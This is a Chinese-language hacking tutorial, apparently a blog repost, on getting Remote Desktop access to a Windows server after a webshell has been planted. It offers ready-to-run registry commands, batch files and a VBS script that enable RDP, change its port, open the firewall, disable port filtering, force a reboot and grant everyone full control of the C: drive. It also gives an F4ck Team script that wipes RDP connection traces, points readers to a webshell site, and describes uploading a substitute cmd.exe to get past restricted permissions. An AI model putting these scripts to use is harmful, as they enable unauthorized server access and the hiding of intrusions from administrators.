远程桌面多种开启方法与权限cmd问题解决

1.webshell开启3389

1.1 通过修改注册表开启3389

1.查询终端端口

xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"

type tsp.reg

2.开启XP&2003终端服务

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更改终端端口为20008(0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5.开启Win2000的终端,端口为3389(需重启)

echo Windows Registry Editor Version 5.00 >2000.reg

echo. >>2000.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg

echo "Enabled"="0" >>2000.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg

echo "ShutdownWithoutLogon"="0" >>2000.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg

echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg

echo "TSEnabled"=dword:00000001 >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg

echo "Start"=dword:00000002 >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg

echo "Start"=dword:00000002 >>2000.reg

echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg

echo "Hotkey"="1" >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg

echo "PortNumber"=dword:00000D3D >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg

echo "PortNumber"=dword:00000D3D >>2000.reg

6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf

(set inf=InstallHinfSection DefaultInstall)

echo signature=$chicago$ >> restart.inf

echo [defaultinstall] >> restart.inf

rundll32 setupapi,%inf% 1 %temp%\restart.inf

7.禁用TCP/IP端口筛选 (需重启)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8.终端超出最大连接数时可用下面的命令来连接

mstsc /v:ip:3389 /console

9.调整NTFS分区权限

cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)

cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)

------------------------------------------------------

3389.vbs cscript.exe

------------------------------------------------------

On Error Resume Next

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set StdOut = WScript.StdOut

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_

strComputer & "\root\default:StdRegProv")

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

strValueName = "fDenyTSConnections"

dwValue = 0

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

Set R = CreateObject("WScript.Shell")

R.run("Shutdown.exe -r -t 0")

转自:http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html

1.2通过3389工具开启3389

bat批处理开启3389

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg

del 3389.reg

将以上代码保存成bat格式通过webshell上传到服务器   再通过webshell执行批处理文件(有的大马没有执行功能 只有上传功能   需要找有执行文件功能的webshell才可以)


上传工具  

文件名复制进来 执行


不同的马使用方式不同   菜刀好像也是可以   

http://www.mumaasp.com/  推荐一个大马网站   但是有后门需要自己清理后门

 也可以用其他的3389工具开启

@echo off

color 0A

title 3389连接痕迹清除    蛋清@F4ckTeam

mode con cols=88 lines=20

echo =======================================================================================

echo  ┏━━━━━━━┓        F CK          法客论坛 - F4ck Team

echo ┏┫    |||┣┓   ┏┓          关于法客 - http://team.f4ck.net

echo ┗┫━━ ┃ ━━┣┛   ┣┫          联系法客 - http://team.f4ck.net/call.html

echo  ┃ ━━━━━ ┃  ┏┳┫┣┳┓      核心成员 - http://team.f4ck.net/team.html

echo  ┗━━━┳━━━┛  ┃    ┃      荣誉会员 - http://team.f4ck.net/honor.html

echo  ┏━━▇▇▇━━━━━┻━━━━┛      邀 请 码 - http://team.f4ck.net/reg.html

echo  ┃  ▇▇▇                            内部邮箱 - http://team.f4ck.net/mail.html

echo  ┃  ▇▇▇                            黑客游戏 - http://game.f4ck.net

echo  ┗  ┃U┃                              漏洞提交 - http://vul.f4ck.net

echo     ┃ ┃                              5 元空间 - http://idc.f4ck.net

echo =======================================================================================

set /p fk= 确定要清空3389连接痕迹吗?(y/n)

if /i "%fk%"=="y" goto y

if /i "%fk%"=="n" goto n

call %0

:y

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f

del /a /f /q %HOMEPATH%\Documents\Default.rdp

echo 命令执行成功,请手动查看是否清除。

pause >nul

:n

exit

上面是3389连接痕迹清楚 也是批处理



2.服务器端口被修改查找方法

通过读取注册表查看3389端口

通过大马读取注册表


也可以通过端口扫描、命令探针获取3389端口

tasklist /svc

netstat -ano

上面两个命令也可以查找远程连接端口


3.CMD权限问题

有些时候运维人员将系统自带的cmd权限调成只有administrator才可以运行

其他的用户无法运行  

可以通过菜刀或大马上传一个cmd  并执行setp cmd.exe 将设置终端路径为自己上传的cmd




这样就可以随便使用cmd了

你可能感兴趣的:(远程桌面多种开启方法与权限cmd问题解决)